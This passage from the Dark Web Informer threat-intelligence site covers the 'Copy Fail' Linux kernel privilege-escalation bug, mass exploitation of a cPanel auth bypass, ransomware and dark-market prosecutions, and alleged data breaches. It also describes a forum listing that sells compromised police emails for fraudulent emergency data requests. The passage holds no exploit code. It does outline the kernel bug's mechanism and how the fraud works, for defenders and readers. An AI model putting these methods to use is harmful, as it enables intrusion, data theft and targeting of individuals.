that endpoint protection is actually reporting home, restrict file types in any user facing channel, and assume that the trust infrastructure you depend on is itself a target. ### "Copy Fail" Lands on CISA's KEV: A Nine-Year-Old Linux Bug Becomes a Patch Deadline URL: https://darkwebinformer.com/copy-fail-lands-on-cisas-kev-a-nine-year-old-linux-bug-becomes-a-patch-deadline/ Last updated: 2026-05-04T17:24:54.000Z On May 1, 2026, CISA added [CVE-2026-31431](https://nvd.nist.gov/vuln/detail/CVE-2026-31431), better known as "Copy Fail," to its [Known Exploited Vulnerabilities (KEV) catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog). Federal civilian agencies have until May 15 to patch under [BOD 22-01](https://www.cisa.gov/news-events/directives/bod-22-01-reducing-significant-risk-known-exploited-vulnerabilities). Everyone else should read that deadline as a strong hint. Copy Fail is a local privilege escalation bug in the Linux kernel's **algif\_aead** cryptographic module, the userspace crypto API exposed through **AF\_ALG**. It carries a CVSS score of 7.8 and has quietly existed since 2017, affecting essentially every mainstream distribution: Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, SUSE 16, and others. The mechanics are uncomfortably elegant. By chaining **AF\_ALG** sockets with the **splice()** syscall and a botched error path, an unprivileged user can land [a controlled 4-byte overwrite in the kernel page cache](https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/). That is enough to corrupt a setuid binary and walk straight to UID 0. [Theori](https://xint.io/blog/copy-fail-linux-distributions), the firm that disclosed the bug on April 29, published a 732-byte Python proof of concept they describe as "100% reliable" across major distros. Go and Rust ports have already shown up in open-source repositories, and Microsoft Defender is reporting [preliminary in-the-wild testing activity](https://www.microsoft.com/en-us/security/blog/2026/05/01/cve-2026-31431-copy-fail-vulnerability-enables-linux-root-privilege-escalation/). Container operators should pay particular attention. Exploitation needs no kernel modules, no special capabilities, and no network access, which makes it a clean post-exploitation step inside Kubernetes pods, Docker CI runners, and shared multi-tenant hosts. A foothold that used to be a nuisance now becomes a root shell. Patches are available in [kernel versions 6.18.22, 6.19.12, and 7.0](https://lore.kernel.org/linux-cve-announce/2026042214-CVE-2026-31431-3d65@gregkh/). Practical priorities: 1. Inventory kernel versions across hosts, containers, golden images, and self-managed cloud VMs. Running fleets and AMIs are separate problems. 2. Patch and reboot, then verify the kernel version actually changed. 3. Where patching lags, restrict local code execution paths: tighten container runtime policies, audit who can land jobs on CI runners, and review SSH access. 4. Refresh base images so tomorrow's autoscaled nodes are not vulnerable replacements for today's fixed ones. KEV is a triage signal, not a vulnerability encyclopedia. When something this trivially exploitable lands on the list with a working PoC already public, it is worth treating the deadline as your deadline too. ### When the Watchman Gets Watched: Trellix Discloses Source Code Breach URL: https://darkwebinformer.com/when-the-watchman-gets-watched-trellix-discloses-source-code-breach/ Last updated: 2026-05-04T16:37:43.000Z There's something uniquely unsettling about a cybersecurity company getting hacked. It's the digital equivalent of a locksmith calling to say someone picked their front door. This week, Trellix joined that uncomfortable club, [confirming](https://thehackernews.com/2026/05/trellix-confirms-source-code-breach.html) that attackers gained unauthorized access to a portion of its internal source code repository. ## What We Know On May 2, 2026, Trellix published an [official statement](https://www.trellix.com/statement/) acknowledging the intrusion. The company said it "recently identified" the compromise, immediately engaged leading forensic experts, and notified law enforcement. According to its investigation so far, there is no evidence that the source code release or distribution process was affected, or that the code itself has been [exploited](https://securityaffairs.com/191584/data-breach/trellix-discloses-the-breach-of-a-code-repository.html). That's the good news. The less reassuring news: Trellix has not disclosed who was behind the attack, how long the intruders had access, or precisely what data they [touched](https://the420.in/trellix-source-code-breach-unauthorised-repository-access-cybersecurity/). Those details, the company says, will follow once the investigation matures. ## Why This Matters More Than the Average Breach Trellix isn't a random SaaS vendor. It was [formed](https://blog.rankiteo.com/tre1777710220-trellix-breach-may-2026/) in January 2022 through the merger of McAfee Enterprise and FireEye, and it's a major player in endpoint security and extended detection and response (XDR), protecting governments, financial institutions, and Fortune 500s. Source code from a security vendor is a high-value asset. As one [analysis](https://hoploninfosec.com/trellix-source-code-breach) put it, if you breach a bank you get the bank's data, but if you breach the company that secures hundreds of banks, you potentially get a blueprint for all of them. Source code lets attackers stop guessing where vulnerabilities live and start reading them off the page. Worse, it opens the door to supply chain attacks, where malicious code is slipped into trusted software updates downstream. ## A Familiar Pattern The Trellix incident slots neatly into a recurring storyline. Microsoft, Okta, and LastPass have all weathered source code breaches in recent years, and each followed a similar [arc](https://cybersecuritynews.com/trellix-source-code-breach/): a high-value target, delayed detection, and an unsettling tail of downstream risk for customers. Whether this turns out to be opportunistic crime or the early move of a nation-state actor playing a longer game remains to be seen. For now, Trellix has pledged transparency and promised to share more technical detail with the security community when the investigation concludes. ## The Takeaway For Trellix customers, there's no immediate call to action. No confirmed exploitation, no evidence of tampered releases. But this is a useful reminder that even the companies you pay to defend you operate in the same threat landscape as everyone else. Trust, in cybersecurity, is always provisional. We'll know more in the coming weeks. The honest answer right now is that the most interesting parts of this story haven't been written yet. ### The cPanel Situation Is Spiraling Fast URL: https://darkwebinformer.com/the-cpanel-situation-is-spiraling-fast/ Last updated: 2026-05-02T22:27:03.000Z On April 29, CVE-2026-41940 was disclosed: a critical pre-authentication bypass in cPanel/WHM that lets remote attackers skip the login flow entirely and gain elevated access. Within 24 hours, it was already being weaponized. [Censys](https://censys.com/blog/the-cpanel-situation-is/) watched the fallout in real time. The 6-day timeline (cPanel hosts flagged malicious): Apr 26: 117 Apr 27: 47 Apr 28: 106 Apr 29: 70 Apr 30: 146 May 1: 15,448 ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/05/fallout.png) On May 1 alone, total malicious hosts jumped by +19,131, and 15,302 of those (roughly 80%) were cPanel/WHM systems. Compare that to the prior days where cPanel made up well under 1.2% of daily changes. This was not background noise. It was a coordinated spike. Top affected providers: DigitalOcean: 1,043 Contabo: 716 OVH: 501 Vultr: 391 Oracle: 321 Unified Layer: 280 Hetzner: 277 Akamai/Linode: 275 GoDaddy: 209 Microsoft: 169 With 1,052,657 cPanel/WHM hosts exposed on the public internet and only 9,595 currently flagged as malicious, the attack surface is enormous and growing. At least two campaigns are running in parallel: a Mirai botnet variant (nuclear.x86) deployed post-compromise, and a ransomware campaign tied to the Sorry/Hidden-Tear family. Ransomware footprint: \~7,000 cPanel servers with ".sorry" encrypted files 6,465 hosts: index.html.sorry 1,637 hosts: index.php.sorry 795 hosts: wp-config.php.sorry Victims directed to attackers via qTox If you run cPanel/WHM, patch immediately. [](https://x.com/DarkWebInformer/status/2050702969167806882/photo/1) ### When the Defenders Become the Attackers: Two U.S. Cybersecurity Pros Sentenced in BlackCat Ransomware Case URL: https://darkwebinformer.com/when-the-defenders-become-the-attackers-two-u-s-cybersecurity-pros-sentenced-in-blackcat-ransomware-case/ Last updated: 2026-04-30T21:38:50.000Z There's a particular kind of betrayal at the heart of this story. Two men paid to defend networks decided it was more lucrative to break them, and the U.S. Department of Justice just sent them to prison for four years each. On April 30, 2026, the DOJ announced that Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were sentenced for their role in deploying ALPHV BlackCat ransomware against multiple American victims throughout 2023\. Both men worked in the cybersecurity industry. They knew exactly what they were doing, and exactly who they were doing it to. ## The scheme Goldberg, Martin, and a third co-conspirator, Florida resident Angelo Martino, 41, struck a deal with the operators of ALPHV BlackCat: in exchange for access to the ransomware and its extortion infrastructure, the trio would hand over 20% of any ransoms they collected. Between April and December 2023, they used that access to attack U.S. companies, including a medical practice and an engineering firm. One victim paid roughly $1.2 million in Bitcoin. The three men split their 80% cut and laundered the proceeds through "various means," according to court documents. What makes the medical-practice attack especially ugly is what happened when the negotiations didn't go their way: they leaked patient data. Assistant Attorney General A. Tysen Duva of the DOJ's Criminal Division didn't mince words, describing how the defendants "played hardball" with victims and went "so far as to cause the leak of patient data from a doctor's office victim." These were people, Duva added, who "were supposed to be cybersecurity specialists who did good and helped businesses and people. Instead, they used their high-level cyber skills to feed their greed." ## A reminder of how ransomware-as-a-service works ALPHV BlackCat operated on a now-familiar criminal business model: ransomware-as-a-service, or RaaS. The developers built and maintained the malware and the dark-web infrastructure. Affiliates, like Goldberg, Martin, and Martino, went out and found victims to attack. After a successful extortion, both sides took a cut. This division of labor is part of what made BlackCat so prolific. According to the DOJ, the group targeted more than 1,000 victims worldwide. It's also what makes RaaS operations so resilient: take down one affiliate, and dozens more remain. ## A negotiator gone rogue The Martino angle deserves its own moment of attention. Martino, who pleaded guilty in April 2026 and is scheduled for sentencing on July 9, didn't just help deploy ransomware. He worked as a *ransomware negotiator*, the person victims hire to broker deals with their attackers. According to the DOJ, he abused that role by feeding confidential victim information back to threat actors so they could jack up the ransom demand. If true, that's a textbook conflict of interest weaponized into a crime. It's the kind of detail that should give every company hiring an outside negotiator a moment of pause about due diligence. ## The takedown, and a chase across 10 countries This sentencing is the latest chapter in a multi-year DOJ campaign against BlackCat. Back in December 2023, the FBI announced that it had developed a decryption tool and had used it to help hundreds of victims recover their systems, saving an estimated $99 million in ransom payments. The Bureau also seized several BlackCat-operated websites at the time. The pursuit of Goldberg himself reads like a thriller subplot. According to FBI Cyber Division Assistant Director Brett Leatherman, when Goldberg tried to flee abroad to escape prosecution, the FBI tracked him through 10 countries before catching up with him. The Mexican federal investigative police at Mexico City's international airport assisted in the operation. Goldberg and Martin pleaded guilty in December 2025 to one count each of conspiracy to obstruct, delay, or affect commerce by extortion. Each got four years. ## What this case tells us A few things stand out. First, the **insider threat in cybersecurity is real**. The industry has a trust problem hidden inside it: the same skills that protect networks can dismantle them, and there's no clean way to vet for moral character. Companies relying on outside security professionals (pentesters, incident responders, ransomware negotiators) should think carefully about background checks, contractual safeguards, and segregation of access. Second, **law enforcement is getting better at this**. The combination of the BlackCat infrastructure seizure in 2023, the development of a working decryption tool, and the international tracking of fleeing affiliates suggests federal cybercrime investigators are operating at a level that would have been hard to imagine a decade ago. The DOJ noted that since 2020, its Computer Crime and Intellectual Property Section has secured over 180 cybercriminal convictions and recovered more than $350 million for victims. Third, **four years still feels light**. Goldberg and Martin participated in attacks that leaked patient data and extracted at least $1.2 million from a single victim, on top of attacks against multiple other organizations. Whether the sentence will deter the next cybersecurity professional tempted to moonlight as an extortionist is an open question. ## If you've been hit The DOJ's reminder at the end of the press release bears repeating. Ransomware victims should contact their local FBI field office or file a report at ic3.gov. Anyone with information about ALPHV BlackCat or its affiliates may be eligible for a reward through the State Department's Transnational Organized Crime Rewards or Rewards for Justice programs. The takedown of one criminal cell never ends ransomware. But cases like this one make the calculus a little less attractive for the next would-be affiliate, especially the ones who already have day jobs defending the networks they're thinking about attacking. --- *Source:* [*U.S. Department of Justice, Office of Public Affairs press release, April 30, 2026*](https://www.justice.gov/opa/pr/two-americans-who-attacked-multiple-us-victims-using-alphv-blackcat-ransomware-sentenced) ### The Fall of Versus: How a 380,000-User Dark Web Marketplace Met Its End in a Colombian Extradition URL: https://darkwebinformer.com/the-fall-of-versus-how-a-380-000-user-dark-web-marketplace-met-its-end-in-a-colombian-extradition/ Last updated: 2026-04-30T21:26:05.000Z A German national, Patrick Schmitz (37), has been extradited from Colombia to the U.S. for allegedly creating and operating "The Versus Project," a leading dark web marketplace that ran from November 2019 to May 2022. At its peak, Versus had 380,000+ registered users, 32,000+ product listings, and facilitated 300,000+ orders worth millions of dollars. The platform sold heroin and other illicit drugs, stolen IDs, counterfeit currency, malware, and hacking tools, using only Bitcoin and Monero to evade traditional financial oversight. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/versus.webp) Schmitz, a co-founder, managed daily operations, recruited vendors and staff, and pocketed a share of the profits. He now faces 8 charges, including continuing criminal enterprise (20-year mandatory minimum, max life), narcotics conspiracy, and money laundering. The DOJ's message is clear: the dark web is no shield. Source: ### Daily Dose of Dark Web Informer - April 30th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-30th-2026/ Last updated: 2026-04-29T22:18:33.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Threat Actor 0056113 Selling Compromised Law-Enforcement Emails and EDR-as-a-Service for Fraudulent Emergency Data Requests](https://darkwebinformer.com/threat-actor-0056113-selling-compromised-law-enforcement-emails-and-edr-as-a-service-for-fraudulent-emergency-data-requests/) FREE 📰 [Hacker Ring Busted in Lviv Oblast After Stealing Gaming Accounts and Selling Them in Russia for Nearly UAH 10 Million](https://darkwebinformer.com/hacker-ring-busted-in-lviv-oblast-after-stealing-gaming-accounts-and-selling-them-in-russia-for-nearly-uah-10-million/) FREE X/Twitter Updates ❗️ [cPanel just released a critical security vulnerability notification.](https://x.com/DarkWebInformer/status/2049266440033673547?s=20) ❗️ [Creedx / MonsterGateway, a Brazilian white-label payment gateway supporting PIX, Boleto, and Credit Card transactions, has allegedly been fully breached on a popular cybercrime forum. The actor claims a complete takeover of the main Supabase CRM serving approximately 30](https://x.com/DarkWebInformer/status/2049223912702038239?s=20) ❗️ [Movilnet, Venezuela's state-owned mobile telecommunications operator, has allegedly been breached, with 200,000 phone numbers and associated subscriber data leaked. The actor states this is part of an ongoing coordinated campaign against Venezuela carried out with Team](https://x.com/DarkWebInformer/status/2049504539473018949?s=20) ❗️ [Preparafaculdade, a large Brazilian educational platform used for pre-vestibular and faculdade preparation courses across multiple units, has allegedly been breached, with a 3.6 GB full database dump put up for sale.](https://x.com/DarkWebInformer/status/2049507674451001734?s=20) ❗️ [Bordeaux Métropole's tourist tax (taxe de séjour) system has allegedly been breached, with a partial database covering 11,000 lodging records leaked.](https://x.com/DarkWebInformer/status/2049514873986449585?s=20) ❗️ [Puerto Inteligente Seguro (PIS), a Mexican government program under the Administración del Sistema Portuario Nacional (Marina) covering port security and management, has allegedly been breached, with a complete database put up for sale.](https://x.com/DarkWebInformer/status/2049517840454103381?s=20) ❗️ [1/2 ezCloud (http://ezcloud.vn), the first Vietnamese company to provide hotel management software solutions, has allegedly been breached, with 55.8 GB of data including 1.5M+ guest records and worldwide passport scans put up for sale.](https://x.com/DarkWebInformer/status/2049538959621992650?s=20) ❗️ [Aman Resorts and Vimeo have been leaked by "ShinyHunters"](https://x.com/DarkWebInformer/status/2049541633201311775?s=20) ❗️ [A service called http://offshore.lc is being advertised on a popular cybercrime forum as bulletproof hosting marketed to threat actors, offering VPS/RDP, dedicated servers, and shared hosting with anonymous signup, no KYC, and crypto-only payments. The seller markets the](https://x.com/DarkWebInformer/status/2049544062907085119?s=20) ❗️ [A threat actor is selling a "domain suspension service" and a methodology kit on a popular cybercrime forum, advertising the ability to forcibly take down arbitrary domains, including .com, .net, .org, .io, and .ai, by abusing registrar abuse-reporting and legal-takedown](https://x.com/DarkWebInformer/status/2049552101437563349?s=20) ❗️ [A Russian-speaking threat actor group is recruiting an Initial Access Broker (IAB) to supply corporate network access on an ongoing basis. The group advertises that they operate "by date, without a locker," meaning they exfiltrate data and extort victims without deploying](https://x.com/DarkWebInformer/status/2049554158307680431?s=20) 💡 [I'm releasing the offline viewer for the Telegram Scraper with Forwarder 2 days early. The only issues you may see using it is performance if adding many chats and lots of media. Also the viewer was partially vibe coded and again, idgaf. Work smarter, not harder.](https://x.com/DarkWebInformer/status/2049558206070788453?s=20) ❗️ [A threat actor is selling a previously unpatched cPanel information disclosure vulnerability that allegedly exposes website login data, including panel and site link, username, and password. The seller claims this is a follow-up vulnerability discovered after the patching of](https://x.com/DarkWebInformer/status/2049562526564655432?s=20) ❗️ [A service called http://offshore.lc is being advertised on a popular cybercrime forum as bulletproof hosting marketed to threat actors, offering VPS/RDP, dedicated servers, and shared hosting with anonymous signup, no KYC, and crypto-only payments. The seller markets the](https://x.com/DarkWebInformer/status/2049544062907085119?s=20) ❗️ [Copy Fail (CVE-2026-31431) is a Linux privilege escalation bug that lets any local user get root using a 732-byte Python script, and it works on basically every major Linux distro shipped since 2017.](https://x.com/DarkWebInformer/status/2049579219190165658?s=20) ❗️ [SMSA Express, a Saudi Arabian logistics and shipping company providing domestic and international parcel delivery, has allegedly been breached, with 1,202,891 customer shipment records put up for sale.](https://x.com/DarkWebInformer/status/2049608628487791057?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### Hacker Ring Busted in Lviv Oblast After Stealing Gaming Accounts and Selling Them in Russia for Nearly UAH 10 Million URL: https://darkwebinformer.com/hacker-ring-busted-in-lviv-oblast-after-stealing-gaming-accounts-and-selling-them-in-russia-for-nearly-uah-10-million/ Last updated: 2026-04-29T19:22:41.000Z Prosecutors in Lviv Oblast, working with the Cyber Police and the Security Service of Ukraine (SBU), have dismantled a criminal group that hijacked Roblox accounts and resold them on Russian websites for cryptocurrency, generating an estimated UAH 10 million in profit. The scheme was allegedly organized by a 19-year-old resident of Drohobych, who recruited two accomplices aged 21 and 22 and is suspected of compromising more than 610,000 accounts belonging to Ukrainian and foreign players. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/1.jpeg) Cyber Police and the Security Service of Ukraine (SBU) The group targeted profiles containing valuable virtual items, rare equipment, and in-game currency balances purchased with real money. To break in, the suspects deployed "stealer" malware disguised as gaming cheats and used stolen cookie files that allowed them to log into accounts without passwords. The hijacked accounts were then sold through closed online communities and a website hosted on a Russian domain, with proceeds funneled into crypto wallets. ![](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/5.jpeg) Cyber Police and the Security Service of Ukraine (SBU) Investigators conducted 10 searches and seized computer equipment, storage media, mobile phones, bank cards, handwritten notes, over EUR 2,500, and nearly USD 35,000 in cash. The suspects have been served notices of suspicion under Part 4 of Article 185 and Part 5 of Article 361 of the Criminal Code of Ukraine, face up to 15 years in prison, and have been placed in pretrial detention while the investigation continues. Source: ### Threat Actor 0056113 Selling Compromised Law-Enforcement Emails and EDR-as-a-Service for Fraudulent Emergency Data Requests URL: https://darkwebinformer.com/threat-actor-0056113-selling-compromised-law-enforcement-emails-and-edr-as-a-service-for-fraudulent-emergency-data-requests/ Last updated: 2026-04-29T19:22:55.000Z Active Threat Report ID: DWI-2026-0429-01 Threat Intelligence Report # Threat Actor 0056113 Selling Compromised Law-Enforcement Emails and EDR-as-a-Service for Fraudulent Emergency Data Requests A threat actor operating under the alias **0056113** has posted a marketplace listing offering **compromised law-enforcement and government email accounts** across multiple countries for the explicit purpose of submitting **fraudulent Emergency Data Requests (EDRs)** to major technology platforms including Instagram, Facebook, WhatsApp, TikTok, Snapchat, Microsoft, and Apple. The same listing also advertises **forged court orders, MLATs, and subpoenas**, an EDR-as-a-service offering against named platforms, and domain-suspending services targeting non-major domains. Published Apr 29, 2026 · 16:31 UTC Origin Multi-jurisdictional Sector Cybercrime-as-a-Service Read Time 7 min Critical Severity An active **fraud-as-a-service marketplace listing** offering tools for the most consequential category of platform abuse currently in circulation. Successful EDR fraud directly enables doxing, stalking, swatting, sextortion of minors, and physical-world harm to platform users. The listing is a live operational threat to every named platform's trust and safety operations. API Access Available Threat intelligence endpoints, ransomware feeds, and IOC data for programmatic integration. [View Details ](https://darkwebinformer.com/api-details/) Premium Intelligence ## Real-time breach tracking, primary-source evidence, and expert analysis. Built for security professionals, researchers, and journalists. Unlock the complete threat feed, ransomware feed, and original claim URLs. [Subscribe ](https://darkwebinformer.com/pricing) 01 ## Incident Summary Date & Time2026-04-29 16:31 UTC Threat Actor0056113 Listing TypeFraud-as-a-Service Primary OfferingCompromised LE / gov emails Use CaseFraudulent EDRs Secondary OfferingsForged orders, EDR-as-service, domain takedown Targeted PlatformsIG, FB, WA, TikTok, Snap, MSFT, Apple, Twitter Jurisdictions in Stock10 countries across 4 regions Pricing Range$20 to $300 per item Account TenureNew (April 2026) Reputation0 NetworkOpen Web Country Multi-jurisdictional 02 ## Incident Overview A threat actor going by **0056113** has posted a marketplace listing on a public cybercrime forum offering tools for what is currently one of the most consequential categories of platform abuse: **fraudulent Emergency Data Requests (EDRs)**. EDRs are an exception to the normal subpoena process under which major technology platforms (Meta, Google, Apple, Snap, TikTok, X, Discord, Microsoft) will release subscriber information, IP logs, recent location data, and in some cases message metadata to law enforcement **without a court order** when there is "imminent danger of death or serious physical injury." Because the bar for verification is necessarily a chain-of-trust check on the requesting officer's email domain, attackers who control a working law-enforcement email account can submit fake emergencies and obtain victim data within hours. The published listing offers a comprehensive fraud-as-a-service menu organised into three categories: - **Compromised Government and Police Email Accounts**The actor advertises stock of working email accounts at law-enforcement and government agencies across ten countries spanning four regions, including Asian, Latin American, African, and European jurisdictions. Per-account prices range from roughly $20 at the low end to $100 for higher-value or harder-to-obtain accounts. The listing claims each account comes with usable access to the agency's portal and can be used for both routine subpoenas and emergency requests. - **Forged Legal Documents**Custom-crafted court orders, MLATs (mutual legal assistance treaty requests), and subpoenas for sale at $100\. These are intended either to accompany an EDR submission or to support a stand-alone subpoena request through normal channels at platforms that require documentation for non-emergency requests. - **EDR-as-a-Service and Domain Suspending**The actor offers to execute the EDR end-to-end on behalf of buyers against named platforms (TikTok, Snapchat, X/Twitter, Facebook, and others) starting at $200\. A separate $300 offering covers **fraudulent domain-suspension requests** against non-major domains, intended to take target sites offline. The categories of data the actor states buyers can obtain include **IP logs, device information, email-to-phone linkages, and in some cases message logs**. In practice, EDR fraud has been documented in the past several years to enable doxing, stalking, swatting, and the targeting of minors for sextortion, with multiple deaths linked directly to information obtained this way. 03 ## Listing Components Compromised LE Email Accounts Government Portal Access Forged Court Orders Forged MLATs Forged Subpoenas EDR Submission Service Domain Suspension Requests Multi-Platform Targeting 04 ## Screenshots [ ![Forum listing by 0056113 advertising compromised government and police email accounts for emergency data requests, with stock list, forged court orders, and EDR services priced from $20 to $300](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/789259872369872653987467239587623.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/04/789259872369872653987467239587623.png) FIG 01 · Forum listing by 0056113 (contact handles redacted in this report) _This post is for subscribers on the Plus, Pro and Elite tiers only._ ### Daily Dose of Dark Web Informer - April 27th, 2026 URL: https://darkwebinformer.com/daily-dose-of-dark-web-informer-april-27th-2026/ Last updated: 2026-04-27T21:55:08.000Z Dark Web Informer # Daily Threat Intelligence Digest ⚡ Real-Time Monitoring 🔑 API Access Available High-volume threat intelligence, ransomware data, IOC exports, and comprehensive feed access for security teams and researchers. [Explore API →](https://darkwebinformer.com/api-details/) 🔁 Follow across all official platforms — [darkwebinformer.com/socials](https://darkwebinformer.com/socials) 🔥 Advertising Opportunities Reach a highly engaged audience of **75,300+** unique users monthly and growing. [View details](https://darkwebinformer.com/advertising) 75.3k Unique Visitors 154.1k Pageviews Last 30 days as of Mar 30, 2026\. Next update Apr 30th. 🔒 ## Unlock Premium Intelligence Real-time breach tracking, expert analysis, high-resolution evidence, unredacted feeds, and 5,100+ blog posts. View all plans and features on the pricing page. [View Plans & Subscribe →](https://darkwebinformer.com/pricing) ## 📌 Legend 📰Law Enforcement — LEA updates, investigations ⚠️Dark Web Notices — forums, markets, announcements ❗️Urgent Threats — breaches, ransomware, vulnerabilities 💡Insights & Tools — guides, OSINT, learning resources 🔒Subscribers Only — [X/Twitter subscribe](https://x.com/DarkWebInformer/creator-subscriptions/subscribe) ## 🧾 Today's Intelligence Threat Intelligence ❗️ [Den kulturelle skolesekken (DKS) Database Breached: 1,389,534 Records Exposed from Norway's National Cultural-Schoolbag Programme](https://darkwebinformer.com/den-kulturelle-skolesekken-dks-database-breached-1-389-534-records-exposed-from-norways-national-cultural-schoolbag-programme/) FREE ❗️ [LCBO (Liquor Control Board of Ontario) Database Breached: 165,840 Customer Records Exposed from Ontario's Crown Corporation](https://darkwebinformer.com/lcbo-liquor-control-board-of-ontario-database-breached-165-840-customer-records-exposed-from-ontarios-crown-corporation/) FREE X/Twitter Updates ❗️ [The Ministerio de Trabajo y Previsión Social (Ministry of Labor and Social Welfare of Guatemala) has allegedly been breached, with 200,000+ user records and 40 GB of resume PDFs up for sale on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048767506043576518?s=20) ❗️ [CTT (Correios de Portugal), Portugal's national postal carrier, has allegedly been breached, with customer data and internal infrastructure details from its Locky smart parcel locker network leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048772869312622609?s=20) ❗️ [Uganda's Ministry of Agriculture, Animal Industry and Fisheries (MAAIF) has allegedly been breached, with its E-Extension System database leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048776454557606117?s=20) ❗️ [Bordeaux Métropole's tourist tax (taxe de séjour) system has allegedly been breached, with a partial database covering 11,000 accommodations leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048781647781175633?s=20) 💡 [Telegram scraper script will have a viewer you can use sometime on Friday. It will be uploaded to the same repo at: https://github.com/DarkWebInformer/telegram-scraper](https://x.com/DarkWebInformer/status/2048802433690751061?s=20) ❗️ [Choice Health Insurance has allegedly been breached, with 2.1 million client and patient records leaked on a popular cybercrime forum. The actor claims the leak also affects other major U.S. healthcare providers including Humana, United Healthcare, Anthem, WellCare, and](https://x.com/DarkWebInformer/status/2048807710033129556?s=20) ❗️ [The University of Kerbala (http://uokerbala.edu.iq), an Iraqi public university, has allegedly been breached, with G Suite user data leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048815251357848029?s=20) ❗️ [1/2 The Oyo State Ministry of Trade, Industry, Investment and Cooperatives (oyostatecommerce) has allegedly been breached, with 275,000 commerce identity card images leaked on a popular cybercrime forum for free.](https://x.com/DarkWebInformer/status/2048818044126863762?s=20) ❗️ [313 Team is claiming a DDoS attack on eBay Japan and eBay US](https://x.com/DarkWebInformer/status/2048819877792579772?s=20) ❗️ ❗️ [TotalEnergies, a major French energy company that produces and sells oil, gas, and renewable energy, has allegedly been breached, with 79,000 customer records up for sale on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048829706154512698?s=20) ❗️ [Checkmarx confirms GitHub repository data posted...](https://x.com/DarkWebInformer/status/2048833554306502980?s=20) ❗️ [The University of San Carlos of Guatemala (USAC) has allegedly been breached, with employee financial information from its SIIF system leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048835770228846609?s=20) 💡 [Arkham script is monitoring over 1,000 cybercrime wallets and Government wallets. The alert threshold is anything over $1,000,000 USD. Alerts will come to the main TG channel. https://t.me/SliceForLifeee](https://x.com/DarkWebInformer/status/2048842199652086049?s=20) ❗️ [Universidad Rafael Landívar, a Jesuit university in Guatemala, has allegedly been breached, with 84,620 photos of students and professors leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048864728118911152?s=20) ❗️ [A threat actor is allegedly selling a React2Shell exploitation toolkit on a popular cybercrime forum, pitched as a way to mass-scan, exploit, and dump databases from vulnerable React-based servers.](https://x.com/DarkWebInformer/status/2048866285870551314?s=20) ❗️ [A threat actor is allegedly selling a full backup of an unnamed crypto B2B affiliate company on a popular cybercrime forum, containing 46 separate product databases tied to crypto, NFT, and AI agent platforms. Pricing starts at $30,000.](https://x.com/DarkWebInformer/status/2048871260298350734?s=20) ❗️ [The MORENA political movement in Tabasco, Mexico has allegedly been breached, with founder records and ID images leaked on a popular cybercrime forum.](https://x.com/DarkWebInformer/status/2048874752467726590?s=20) 💡 [This is the only way.](https://x.com/DarkWebInformer/status/2048876214475952535?s=20) [darkwebinformer.com](https://darkwebinformer.com/)· [socials](https://darkwebinformer.com/socials)· [subscribe](https://darkwebinformer.com/pricing) © Dark Web Informer. All rights reserved. ### LCBO (Liquor Control Board of Ontario) Database Breached: 165,840 Customer Records Exposed from Ontario's Crown Corporation URL: https://darkwebinformer.com/lcbo-liquor-control-board-of-ontario-database-breached-165-840-customer-records-exposed-from-ontarios-crown-corporation/ Last updated: 2026-04-27T17:14:31.000Z Active Threat Report ID: DWI-2026-0427-03 Threat Intelligence Report # LCBO (Liquor Control Board of Ontario) Database Breached: 165,840 Customer Records Exposed from Ontario's Crown Corporation A threat actor operating under the alias **Spirigatito** has released the customer database of **LCBO** (Liquor Control Board of Ontario), the Government of Ontario's Crown corporation responsible for the retail and wholesale distribution of beverage alcohol throughout the province and one of the largest single retailers of alcohol in the world. The listing claims a breach affecting **165,840 customer records**, with each record containing the customer's name, email address, phone number, and account type. Published Apr 27, 2026 · 17:35 UTC Origin Canada (Ontario) Sector Government / Retail (Crown Corporation) Read Time 6 min Critical Severity A breach of the customer database of **Ontario's provincially-owned alcohol retailer**, exposing 165,840 records containing names, emails, phone numbers, and 